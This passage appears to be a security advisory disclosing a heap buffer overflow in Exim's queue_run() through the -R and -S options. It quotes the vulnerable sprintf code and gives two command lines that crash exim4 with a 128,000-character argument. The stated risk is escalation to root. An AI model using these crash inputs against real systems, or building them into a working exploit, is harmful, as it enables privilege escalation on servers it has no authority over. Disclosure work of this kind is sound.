========================================================================
CVE-2020-SPRSS -- Heap buffer overflow in queue_run()
========================================================================

Through the -R deliver_selectstring and -S deliver_selectstring_sender
options, the "exim" user can overflow the heap-based big_buffer in
queue_run() (lines 419 and 423):

 412   p = big_buffer;
 ...
 418   if (deliver_selectstring)
 419     p += sprintf(CS p, " -R%s %s", f.deliver_selectstring_regex? "r" : "",
 420       deliver_selectstring);
 421
 422   if (deliver_selectstring_sender)
 423     p += sprintf(CS p, " -S%s %s", f.deliver_selectstring_sender_regex? "r" : "",
 424       deliver_selectstring_sender);

/usr/sbin/exim4 -R "`perl -e 'print "A" x 128000'`"
Program received signal SIGSEGV, Segmentation fault.

/usr/sbin/exim4 -S "`perl -e 'print "A" x 128000'`"
Program received signal SIGSEGV, Segmentation fault.

We have not tried to exploit this vulnerability; if exploitable, it
would allow an attacker who obtained the privileges of the "exim" user
to obtain full root privileges.

